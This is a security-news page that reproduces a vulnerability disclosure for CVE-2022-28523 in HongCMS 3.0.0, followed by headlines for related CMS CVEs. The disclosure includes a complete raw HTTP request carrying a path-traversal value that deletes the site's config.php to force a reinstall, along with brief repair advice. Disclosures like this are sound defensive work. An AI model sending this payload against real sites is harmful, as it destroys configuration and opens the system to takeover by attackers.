Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-28523: There is an arbitrary file deletion vulnerability here: /admin/index.php/template/ajax?action=delete · Issue #17 · Neeke/HongCMS

HongCMS 3.0.0 allows arbitrary file deletion via the component /admin/index.php/template/ajax?action=delete.

CVE
Open in Source
#vulnerability#windows#js#git#java#php

Vulnerability file: \admin\controllers\template.php
The vulnerability code is as follows:
image

Arbitrary file deletion vulnerability could lead to system reinstallation
Vulnerability to reproduce:
1、First log in to the background to get cookies

2、Part of the code in the /install/index.php file is as follows:
the following code means that the system can be reinstalled as long as the /config/config.php file is deleted

image

3、Construct the packet that deletes the config.php file as follows:

POST /admin/index.php/template/ajax?action=delete HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.xxx.com/admin/index.php/template?dir=Default/
Content-Length: 30
Cookie: w4Gy9uu6fQW3admin=60edcf231451d2f7493eb8dcfc46d32e
DNT: 1
Connection: close

dir=Default%2F&file=…/…/…/config/config.php

Repair suggestion:
1、Filter …/ or …\ in file variables
2、Only allow files in the specified directory to be deleted

Related news

CVE-2022-28918: There is an arbitrary file deletion vulnerability here: /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name= · Issue #116 · GreenCMS/GreenCMS

GreenCMS v2.3.0603 was discovered to contain an arbitrary file deletion vulnerability via /index.php?m=admin&c=custom&a=plugindelhandle&plugin_name=.

CVE-2022-28527: There is an arbitrary folder deletion vulnerability here:/admin.php?r=admin/AdminBackup/del · Issue #5 · ShaoGongBra/dhcms

dhcms v20170919 was discovered to contain an arbitrary folder deletion vulnerability via /admin.php?r=admin/AdminBackup/del.

CVE-2022-28522: There is a stored xss vulnerability here: /index.php?m=home&c=message&a=add · Issue #5 · jorycn/thinkphp-zcms

ZCMS v20170206 was discovered to contain a stored cross-site scripting (XSS) vulnerability via index.php?m=home&c=message&a=add.

CVE-2022-28528: There is a file upload vulnerability here: /admin/index.php?mode=content&page=media&action=edit · Issue #14 · alexlang24/bloofoxCMS

bloofoxCMS v0.5.2.1 was discovered to contain an arbitrary file upload vulnerability via /admin/index.php?mode=content&page=media&action=edit.

CVE-2022-28521: bug_report/zcms:php file inclusion at main · zhendezuile/bug_report

ZCMS v20170206 was discovered to contain a file inclusion vulnerability via index.php?m=home&c=home&a=sp_set_config.

CVE-2022-27984: SQL injection vulnerability exists in CuppaCMS /administrator/templates/default/html/windows/right.php · Issue #30 · CuppaCMS/CuppaCMS

CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE